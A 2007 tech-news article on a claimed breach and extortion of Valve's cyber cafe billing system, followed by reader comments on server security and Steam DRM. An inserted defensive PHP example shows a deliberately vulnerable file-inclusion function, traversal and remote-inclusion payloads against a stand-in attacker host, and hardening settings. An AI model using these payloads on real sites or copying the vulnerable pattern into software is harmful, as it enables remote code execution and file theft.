




Screenshots posted by MaddoxX reveal the extent of the breach
Cafe owners are in trouble, and users who made online purchases may be next

Valve's STEAM content distribution system has been the target of no small share of bad press since it was created, with complaints ranging from apathetic customer service to the inability to play legitimately purchased games online. Some users have had their accounts locked, deleted, or hijacked - but a hacker known only as "MaddoxX" has just opened a rather sizeable can of worms.

According to a posting made on an anti-STEAM website, MaddoxX has bypassed Valve's security system and accessed a significant chunk of data, including:
  • Screenshots of internal Valve web pages
  • A portion of Valve's Cafe directory
  • Error logs
  • Credit card information of customers
  • Financial information on Valve
While only the Cafe owners appear to be in immediate danger, MaddoxX claims to "have shell access everywhere," and has posted a list of login details for accounts on what he says are Valve servers. MaddoxX also claims to have obtained the program's private certificates, and says that with them "People with a little bit of (sic) experience ... create their own 'fake' but working cafe / certificate."

It is not currently known how far-reaching the credit card breach is, but STEAM users who have purchased products online for electronic delivery would do well to keep an eye on their credit card statements for the coming weeks, especially if MaddoxX makes good on a promise to release a "spreadsheet."

STEAM cafe owners worldwide are more than a little upset with the information already leaked. MaddoxX has posted emails received from cafe owners and operators:
Believe me, nobody wants to 'stick it to Valve' more than those currently in the cafe program. We're rubbing pennies together trying to make it from month to month, while Valve is making millions off of us ... All I ask is that you make some effort to edit cafe numerical details from any future release.

Please don't release the CC information, for the sake of the centers who are less informed.
MaddoxX does make one thing quite clear in his electronic manifesto:
If you want me to remove these files you can e-mail me at (address removed) and I prefer you come with something good unless you want me to expose ALL of the customers their information.
It seems that Valve is being held for ransom. If this is true, Valve may be in trouble: California Senate Bill 1386 requires a business to notify California residents whose unencrypted personal information, credit card numbers included, has been acquired by an unauthorized person, and MaddoxX already knows exactly how much money Valve has available.

Update 04/19/2007: Doug Lombardi, director of marketing at Valve, contacted DailyTech with the following statement:
There has been no security breach of Steam. The alleged hacker gained access to a third-party site that Valve uses to manage the commercial partners in its Cyber Café program. This Cyber Café billing system is not connected to Steam. We are working with law enforcement agencies on this matter, and encourage anyone with more information to e-mail us at Catch_A_Thief@valvesoftware.com.


Comments



Yup, I knew it.
By Captain Orgazmo on 4/19/2007 12:24:53 AM , Rating: -1
This is exactly the reason I refuse to buy games from online distribution systems. Unfortunately, they still force you to register your store-bought games on Steam, meaning if they were to shut down, or experience a massive data loss, you would lose what you had legally bought. Infringing on consumer rights the way Steam does only encourages people to use pirated games. Same with StarForce: how dare they install their crap on your system... any game with that protection is given a death sentence before it is even available.




RE: Yup, I knew it.
By Justin Case on 4/19/2007 1:04:28 AM , Rating: 4
I expect you play Solitaire and Tetris a lot, then?

If "this" (meaning CC data theft) "is exactly the reason why you refuse to buy games from online distribution systems", I expect you also "refuse" to do any on-line shopping, or even use a CC to pay for groceries / meals / etc.. After all, CC data can just as easily be (and frequently is) stolen from any other database. For all you know, the guy at the restaurant where you last used your CC copied your name and number and is using them right now... to buy games on Steam. ;)

Games bought through Steam are cheaper, can be backed up, downloaded as many times as you want, installed on multiple computers, and they don't force you to keep any CD / DVD in the drive. If Valve "suffered major data loss" (which is kind of unlikely, when you run multiple mirrored RAIDs), they'd simply restore from the last backup and request recent CC activity from their bank. Do you also worry about your bank "suffering major data loss" and you losing all your money?

I for one have no complaints about Steam, on the contrary. As DRM goes, it's by far the most civilized version.

Now, if this turns out to be true, leaving CC info accessible via the net is a pretty dumb mistake. There's nothing wrong with using Windows on their servers; Windows Server with a good admin can be as secure as any other OS. And BSD / Linux / Solaris with a bad admin can be as secure as Windows 95.

I doubt they keep any CC info about individual users, though; I seem to recall that I have to re-enter my CC info each time I want to buy a game.


RE: Yup, I knew it.
By Runiteshark on 4/19/2007 2:01:20 AM , Rating: 2
quote:
There's nothing wrong with using Windows on their servers; Windows Server with a good admin can be as secure as any other OS. And BSD / Linux / Solaris with a bad admin can be as secure as Windows 95.


I totally disagree with you there. The primary problem with Windows systems is the amount of buffer overflows, or other random exploits found on them. I'm not saying that nix or BSD doesn't have its share of exploits (proc race anyone?), but there are quite a few less than what is out for Windows. However you are correct, an attacker wouldn't be able to do anything if they did indeed secure their PHP setup properly (unless they had a mystical Apache/IIS6 0day) as long as they couldn't get a shell there. However, once a shell is on that setup, if on nix or BSD systems, it is possible to prevent any further security breaches (root), whereas with Windows, you are basically screwed. I'm definitely not saying that sec can't be bypassed on the nix/BSD setups (PHP module inclusion exploits, 0days), but it can be contained.

If you seriously think that Windows is a good choice for anything other than a workgroup or domain management OS, take a stroll down any exploit website (milw0rm for example). Even the exploits that Microsoft warns about turn into 0days before Microsoft patches them, as was the case with a recent one. At least with nix or BSD variants you can have much more control over user privileges (no exec, chrooted, jailed, control over what they exec, no compiling, etc.), whereas with how IIS is set up, once someone has access, you are done.

The guy that had access to this box could so easily bot so many machines it's not even funny. I don't know if you know about the .ani exploit (think WMF but worse), but it could so easily be included onto their main page with even that basic shell that it's scary.

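The "PHP module inclusion exploits" and "upload-enabled PHP" misconfigurations that the comments above argue about are a concrete, well-understood flaw class. The following is an added example written for this page, not code from the article, from Valve, or from any commenter: a file-inclusion bug of that kind next to a hardened version, with the php.ini settings that limit the damage when such a bug slips through. The page names (pages/home.php, pages/cafe.php) and the attacker URLs are assumptions for illustration.

```php
<?php
// Added example (not from the article or the comments). Illustrates a PHP
// file-inclusion flaw and its fix; file names and attacker hosts are made up.

// VULNERABLE: the include path is built straight from user input.
// Requests that turn this into code execution or file disclosure:
//   page.php?p=../../../../etc/passwd%00   local file inclusion (the %00
//                                          truncation worked on PHP < 5.3.4)
//   page.php?p=http://attacker.example/s   remote inclusion, if
//                                          allow_url_include=On
//   page.php?p=../uploads/avatar.jpg       on an "upload-enabled" site the
//                                          attacker supplies the PHP code
//                                          inside a file the app accepted
function render_vulnerable(string $p): void
{
    include $p . '.php';
}

// HARDENED: the request parameter is only ever a key into an allowlist.
// Nothing derived from user input reaches the filesystem or the network.
const PAGES = [
    'home' => 'pages/home.php',
    'cafe' => 'pages/cafe.php',
];

function render_safe(string $p): void
{
    if (!array_key_exists($p, PAGES)) {
        http_response_code(404);
        exit;
    }
    include __DIR__ . '/' . PAGES[$p];
}

// Defence in depth, in php.ini, so the next inclusion bug is contained
// rather than a shell (this is the "contain it" point made in the thread):
//   allow_url_include = Off        ; no include/require over http:// or ftp://
//   allow_url_fopen   = Off        ; no fopen()/file_get_contents() of URLs
//   open_basedir      = /var/www/app   ; PHP may only open files below here
//   disable_functions = exec,system,shell_exec,passthru,popen,proc_open
// and, in the web server, deny PHP execution in the upload directory so a
// planted .php (or .jpg with PHP inside) is served as data, never run.

render_safe($_GET['p'] ?? 'home');
```

The allowlist is the actual fix; the php.ini lines do not remove the bug but turn "attacker runs code" into "attacker gets a 404 or a read error", which is what a chrooted or jailed web tier buys you on the OS side.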

RE: Yup, I knew it.
By Justin Case on 4/19/2007 2:25:57 PM , Rating: 5
I don't know what planet you live on, but I can tell you that, on this one, several banks run their entire backbone on... Windows. I'm not saying it's an efficient way to do things (for starters, it's more expensive than the alternatives), but it is perfectly possible to have secure Windows-based systems (I'm talking NT / 2000 / Server, not XP Home or any of that crap, of course).

A properly configured web server won't let hackers in in the first place, and careful configuration of your firewall, users, NTFS permissions, and internal network permissions can do the rest (in other words, the same things a sane and competent admin would do in a Unix system). Server 2003's defaults are even pretty civilized (as long as you add a good firewall and get rid of IIS).

Obviously if you run a vanilla install of Apache (or, god forbid, IIS) and upload-enabled PHP on an administrator account on a FAT volume, on a LAN with file sharing enabled, without a (real) firewall, you're asking for trouble.

NTFS gives, if anything, a lot more control over file permissions than the most common *nix filesystems. 99.9% of people don't have a clue about NTFS or user permissions but then, 99.9% of people aren't server admins.

It's not the OS that makes a system secure, it's the admin. On a properly configured system, external attackers (or clients in general) shouldn't even be able to figure out the server's OS.

P.S. - Remember Valve was founded by ex-Microsoft guys, so I guess having 100% secure systems would go against their nature. ;-)


RE: Yup, I knew it.
By Neosis on 4/19/2007 8:37:30 PM , Rating: 2
quote:
NTFS gives, if anything, a lot more control over file permissions than the most common *nix filesystems. 99.9% of people don't have a clue about NTFS or user permissions but then, 99.9% of people aren't server admins.


".. most common *nix filesystems .." I presume you mean ext3 and ReiserFS. You are right about these two, NTFS enables more advanced file permission settings than POSIX, however these are not commonly used in servers by experienced system admins. One of the important reasons is the poor scalability of ext3. (maybe with htrees, it's ok)

For security features and scalability, NSS has many advantages over NTFS, though recently NTFS gained similar features like Access Based Enumeration. It is similar to visibility in NSS. No surprise if we think NTFS is a derivative of the Novell NetWare 2.x ACL mode.

Here you can see its features: http://en.wikipedia.org/wiki/Novell_Storage_Servic...


RE: Yup, I knew it.
By Justin Case on 4/19/2007 11:20:59 PM , Rating: 2
NTFS actually has a lot of tricks up its sleeves that aren't "officially" documented, but if you hang around the MS newsgroups you'll see that it can do pretty much anything you want (and a lot of things you don't ;-).


RE: Yup, I knew it.
By Ryanman on 4/19/2007 4:58:13 AM , Rating: 2
There's a huge difference between, say, Half-Life 2 and Homeworld. First, I do not have to connect my computer to the internet to play a damn game. When I want to play Half-Life 2 I want to turn off everything so I can play it on my max settings. Too bad I have to run my antivirus, Steam, and my wireless utility. Steam alone isn't exactly a light stepper on the system. If I'm not playing the game online and Valve has already sucked enough money out of the franchise to cure cancer, why should I have to say "oh hey, I'm playing a game I bought."
I don't mind having to hook up to the net for CS at all; it IS an online game already. But when I'm playing one of the best games ever made, one I would have willingly paid 100 bucks for if not for Steam, it chaps me pretty bad.
One of the reasons I bought Oblivion was because of its complete lack of any protection. I've never really been an RPG fan. Lo and behold the game was a godsend; my sister also purchased it for the 360. THANK you Bethesda/2K for making a game definitely worth the 8 hours I had to work to pay for it.


RE: Yup, I knew it.
By Schrag4 on 4/19/2007 10:37:11 AM , Rating: 2
Uh, you only have to be connected to the internet once to play single player games for the rest of time. Sure, you won't get updates, but wouldn't you need to *connect your computer to the internet* to get those?

Don't get me wrong, I have my share of complaints about steam, mainly because I have to keep re-installing it (and any games I play using Steam). Not only that, but I have been a victim of the "patch that breaks the game for a day" problem, that really sucks. However, I think your complaint about having to connect to the internet to play the game is kinda weak, because it's no hassle to you, and if you don't have a net connection, you can still play the game.


RE: Yup, I knew it.
By Justin Case on 4/19/2007 2:51:13 PM , Rating: 2
Your antivirus is unlikely to eat more than 0.1% of your CPU cycles, and Steam is perfectly dormant while games are running (it won't even download other games' updates, which is a bit annoying because I have bandwidth to spare). I don't know what your "wireless utility" is, but my guess is it won't make much difference to your system's speed, either. Windows services like PnP (that constantly checks for new USB devices, etc.) will eat a *lot* more CPU cycles (but probably still not enough to be relevant, especially if you have a dual-core or dual-CPU system).

And you don't need to have an internet connection to play HL2. Not every time, at least. On my system I don't remember HL2 ever complaining that my net connection was down (and I've played it offline lots of times). It probably needs to "phone home" once every few days, but not every time. And I got it through Steam, so it's not checking for the original CD, either.

Regarding the games you mentioned: the main difference between HL2 and Homeworld is that HL2 is very good and Homeworld is crap. Okay, HW:Cataclysm was terrific, but Homeworld 2 was even crappier than the first one. :-)

As to Oblivion, well, I am a RPG fan, I did buy it (special edition, too), and IMO it wasn't worth the money or the wait. It's a hack'n'slash game with a few bad, completely disconnected stories sprinkled on top, and possibly the most disappointing AI ever (partly due to all the pre-release hyping). The game feels less interactive than Ultima 7, which is 15 years old, and has less atmosphere than Morrowind (its predecessor). It does have nice graphics and generally fun combat, but I was expecting a RPG (meaning a believable, consistent, immersive "world simulator"), not a 3D version of Diablo. It was clearly designed for younger console gamers, not "old school" RPG fans. If only Valve would reunite the Origin / Looking Glass team and produce a real, polished, consistent RPG, based on Source... I can dream, can't I? :-)


RE: Yup, I knew it.
By SquidianLoveGod on 4/21/2007 11:11:49 AM , Rating: 3
quote:
Your antivirus is unlikely to eat more than 0.1% of your CPU cycles


That depends on the virus scanner in question.
Kaspersky stops scanning etc. if you're busy playing a game etc.

quote:
the main difference between HL2 and Homeworld is that HL2 is very good and Homeworld is crap. Okay, HW:Cataclysm was terrific, but Homeworld 2 was even crappier than the first one. :-)


I disagree, there are thousands of Homeworld players around, making your point that the game is crap negated. I personally think Half-Life 2 is crap, and StarCraft is the best thing going since sliced cheese. Yet there are a lot of Half-Life 2/Source/CS players around. (Not as many as StarCraft and Brood War though :P the Battle.net community is huge, and it's a national Korean sport!).

quote:
As to Oblivion, well, I am a RPG fan, I did buy it (special edition, too), and IMO it wasn't worth the money or the wait. It's a hack'n'slash game with a few bad, completely disconnected stories sprinkled on top, and possibly the most disappointing AI ever (partly due to all the pre-release hyping). The game feels less interactive than Ultima 7, which is 15 years old, and has less atmosphere than Morrowind (its predecessor). It does have nice graphics and generally fun combat, but I was expecting a RPG (meaning a believable, consistent, immersive "world simulator"), not a 3D version of Diablo. It was clearly designed for younger console gamers, not "old school" RPG fans. If only Valve would reunite the Origin / Looking Glass team and produce a real, polished, consistent RPG, based on Source... I can dream, can't I? :-)


Again I disagree, Oblivion is very much like its predecessor, except it takes the best of that game and improves on it: graphics, AI, quests, immersion etc.
Try doing the Arena quest, join a mages guild, follow the quests etc. and GET yourself involved in the game. It's not a game that will make you get off your ass and make it immersive, that's something that's left up to the player. For instance you are given the Kvatch quest to close down the Oblivion gate; instead I decided to go to Bruma and do the mages guild recommendation quests, travelled from town to town, killed a few vampires, became rather powerful, finished the arena, so I decided to turn evil and kill everything I could.

Oblivion has a main story line, yet a lot of other story lines that you could continue doing, and forget about the main quest. And personally, I enjoy walking through a town and hearing people chatter, etc. And it does have immersion on a higher level than morrowing 3. -If you want to prove me wrong, point something out, and make my day ;)
And comparing the Morrowind series against the Diablo series shows you haven't played or completed any of those games. -.-

(Note I have completed both morrowind 3 and Oblivion)


RE: Yup, I knew it.
By Justin Case on 4/22/2007 10:26:33 PM , Rating: 2
Actually, I have completed those and just about every other CRPG ever made (well, since 1987, at least). In other words, I've been playing these things (and, for a short while, developing them) since the time when you were, I suspect, a mere glint in your father's eye.

Oblivion is a hack'n'slash console game made for 9 year olds with Xboxes. It requires about 3 working neurons, and two of those die after a week from terminal boredom. Add some fan-made mods (ex., OOO) and that grows to maybe a month, but it still feels disjointed. Morrowind's world might have been dead, but it had atmosphere and consistency (BTW, there is no such thing as "Morrowind 3", let alone "Morrowing 3" - now that you've completed it, you might want to read the name on the box). Morrowind wasn't great (it was barely good) but it held promise. Which makes Oblivion even more disappointing.

Ultima 7 is probably the best CRPG ever made, but I suspect you've never played it (or System Shock, for that matter).

The differences in style between these games are not accidental; they are a result of the way each of them was planned, developed and playtested. Good RPGs need a strong driving vision and tons of playtesting by very different people. Oblivion was designed for consoles (and console players, specifically the ones that need a little arrow to guide them through the entire game), its "missions" were developed by separate teams (and put together at the end), and it was playtested only by its developers. Calling Oblivion a RPG is like calling Doom an intellectual strategy simulator.

And no, Kaspersky AV does not "stop scanning if your [sic] busy playing a game". It will continue to work as always: scanning every file that is accessed by running processes. All real-time file protection scanners work that way, and they need almost no CPU cycles.


RE: Yup, I knew it.
By SquidianLoveGod on 5/3/2007 10:00:14 PM , Rating: 2
Actually I never played System Shock, I did play System Shock 2. And Morrowind 3 is what they call The Elder Scrolls 3, so Morrowind 3 is good enough for me.
And to me, I think Oblivion is far better than Morrowind 3 will ever be.
And I have been around computers for a few ages. I watched the rise and fall of the great 3dfx, the introduction of the Sound Blaster, and the dawn of the Commodore 64, which was enjoyable as I could MAKE my own games in BASIC (Beginner's All-purpose Symbolic Instruction Code).

"And no, Kaspersky AV does not "stop scanning if your [sic] busy playing a game". It will continue to work as always: scanning every file that is accessed by running processes. All real-time file protection scanners work that way, and they need almost no CPU cycles."
Yes it does, Have a look at it again and find the setting which allows the program to pause what it is doing when CPU cycles are being used.

"Ultima 7 is probably the best CRPG ever made"
And... You're full of shit.
Well in my opinion.
Other people may agree or disagree.

Also... Have you had your pap smear? You're kinda cranky, madam.


RE: Yup, I knew it.
By LatinMessiah on 4/24/2007 12:56:16 PM , Rating: 2
I don't think the main purpose of Steam is to make sure you paid for the game you're playing. I think it's to keep track of what kind of games you play and how often you play them. This information might prove valuable to Valve's marketing department. Just a theory.


RE: Yup, I knew it.
By SailorRipley on 4/19/07, Rating: -1
RE: Yup, I knew it.
By Rockjock51 on 4/19/2007 12:24:01 PM , Rating: 5
Out of curiosity, what makes it different just because he isn't associated with Valve? An employee poses just as much risk to you as someone who has nothing to do with the company don't they? A guy in a dumpster looking for the old imprints of credit cards they use when your card doesn't scan right could do the same thing.


RE: Yup, I knew it.
By mindless1 on 4/23/2007 7:05:40 PM , Rating: 2
No you don't expect Solitaire and Tetris, you're just ignorant of other games that don't impose these problems, or are deliberately ignoring truth to make a deceitful argument. Which is it?

No, "this" isn't using credit cards in general, another deliberate attempt at deceitful argument, trying to twist a legitimate concern into a different implausible angle.

Games bought through Steam do have the obvious disadvantage; to try and defend them shows bias. I'm not claiming that as an excuse for this hack, but trying to take their side is no better than trying to take the hacker's side, when the solution they imposed causes problems for those who PAID for the game. It ends up always being the customer who is affected and it shouldn't be, as they did PAY for the product.

Of course there is something wrong with using Windows on the servers. Windows Server is, like the other Windows versions, continually being patched, so at any given moment odds are high it is exploitable, and more importantly, actually targeted and exploited. No amount of nonsense about "good admin" makes it possible to secure a closed operating system's flaws. No matter how diligently one were to patch it, it's always a game of catch-up, racing to close a hole after it was ALREADY found. These holes are exactly what a determined hacker would use, not only looking at what an unpatched Windows is vulnerable to.


RE: Yup, I knew it.
By theteamaqua on 4/19/2007 2:10:54 AM , Rating: 2
quote:
RE: Yup, I knew it......


I totally agree man. If I buy anything, not just software, from a store, I expect to be able to install it and do everything without having to register online. That's what I hate about Steam.

The problem is that more and more games use Steam's service for distributing games... and the last thing I want is for Steam to distribute the majority of games (say 100 games a year). If that happens they can pretty much do anything they want and you can't do anything about it, like treating customers like crap... pay a monthly fee and crap.













Copyright 2014 DailyTech LLC.